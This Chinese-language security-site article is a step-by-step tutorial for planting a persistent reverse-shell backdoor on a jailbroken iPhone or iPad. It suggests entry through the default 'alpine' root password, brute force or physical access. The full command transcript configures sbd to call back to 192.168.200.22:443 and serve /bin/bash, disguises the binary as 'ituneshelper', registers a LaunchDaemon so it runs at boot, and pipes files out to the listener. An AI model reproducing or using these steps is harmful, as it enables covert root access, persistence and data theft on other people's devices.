热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

给iphone/ipad留下永久的反向连接后门

发布时间:2013-01-14 20:58文章来源:网络文章作者:秩名 点击次数:
摘要:既然要留个后门,必须要进入该设备,越狱之后修改OpenSSH 默认 账号root 密码alpine。你可以通过ssh连接进去,暴力破解也行,物理接触也行,只要你能达到目的。 我们可以使用Michel Blomgren的sbd-1.36 backdoor。(只支持TCP / IP通信) 1. 安装 iphone-gcc...

 

既然要留个后门,必须要进入该设备,越狱之后修改OpenSSH 默认 账号root 密码alpine。你可以通过ssh连接进去,暴力破解也行,物理接触也行,只要你能达到目的。
我们可以使用Michel Blomgren的sbd-1.36 backdoor。(只支持TCP / IP通信)
1. 安装 iphone-gcc & make:
iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg

iphone4:~ root# apt-get install iphone-gcc
Reading package lists… Done
Building dependency tree
Reading state information… Done

Setting up ldid (610-5) …
Setting up com.sull.iphone-gccheaders (1.0-11) …
Setting up com.sull.fake-libgcc (1.0-2) …
Setting up iphone-gcc (4.2-20080604-1-8) …
iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists… Done
Building dependency tree
Reading state information… Done

Unpacking make (from …/make_3.81-2_iphoneos-arm.deb) …
Setting up make (3.81-2) …


2. 下载后门:
iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
–2012-04-23 23:50:43– http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com… 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz’
100%[======================================>] 84,093 66.3K/s in 1.2s
2012-04-23 23:50:45 (66.3 KB/s) – `sbd-1.36.tar.gz’ saved [84093/84093]
iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx—— 3 1000 100 748 Sep 17 2004 ./
drwxr-x— 6 root wheel 272 Apr 23 23:50 ../
-rw——- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw——- 1 1000 100 18007 Jun 8 2004 COPYING
-rw——- 1 1000 100 2176 Jun 20 2004 Makefile
-rw——- 1 1000 100 4880 Sep 11 2004 README
-rw——- 1 1000 100 31370 Jun 12 2004 aes.c
-rw——- 1 1000 100 549 Jun 11 2004 aes.h
drwx—— 2 1000 100 136 Sep 11 2004 binaries/
-rw——- 1 1000 100 77 Jun 2 2004 doexec.c
-rw——- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw——- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw——- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx—— 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw——- 1 1000 100 13381 Sep 8 2004 pel.c
-rw——- 1 1000 100 898 Sep 9 2004 pel.h
-rw——- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw——- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw——- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw——- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw——- 1 1000 100 436 Jun 2 2004 sha1.h
-rw——- 1 1000 100 20800 Sep 9 2004 socket_code.h


3.Sbd配置(反向连接的ip地址、端口、密码加密设置,连接间隔等)
iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET “password”
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX “\x1b[0;32m”
#define HIGHLIGHT_SUFFIX “\x1b[0m”
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA “: ”
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE “shadowinteger_bd_semaphore”
/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
* reconnect every 10 seconds.
*/
#define DOLISTEN 0
#define HOST “192.168.200.22″
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG “/bin/bash”
或者,可以使用以下参数:
host: ./sbd -l -p 443 -k 1234
server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443


4.编译   // 云安全 http://www.yunsec.net
iphone4:~/sbd-1.36 root# make
usage:
make unix – Linux, NetBSD, FreeBSD, OpenBSD
make sunos – SunOS (Solaris)
make win32 – native win32 console app (w/ Cygwin + MinGW)
make win32bg – create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH – stealthy no-console app
make mingw – native win32 console app (w/ MinGW MSYS)
make mingwbg – native win32 no-console app (w/ MinGW MSYS)
make cygwin – Cygwin console app
make darwin – Darwin
iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd
iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*


5.执行后门
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r–r– 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
iphone4:/Library/LaunchDaemons root# cat << EOF > > com.ituneshelper.start.plist
Label
com.ituneshelper.start
ProgramArguments
/usr/bin/ituneshelper
RunAtLoad
StartInterval
1
EOF
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r–r– 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r–r– 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist


6.连接目标
root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
root@coresec:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:03:72:5e
inet addr:192.168.200.22 Bcast:192.168.200.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20159805 (20.1 MB) TX bytes:720669 (720.6 KB)
root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef
bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

7.文件的传输
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret
> output.file
iphone4:~/sbd-1.36 root# cat /…/…/input.file | ./sbd -k secret 192.168.200.22 12345

8.卸载后门
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper
 

标签分类:

上一篇:移动设备带来的安全新挑战
下一篇:三星N7100完美安装backtrack5 破解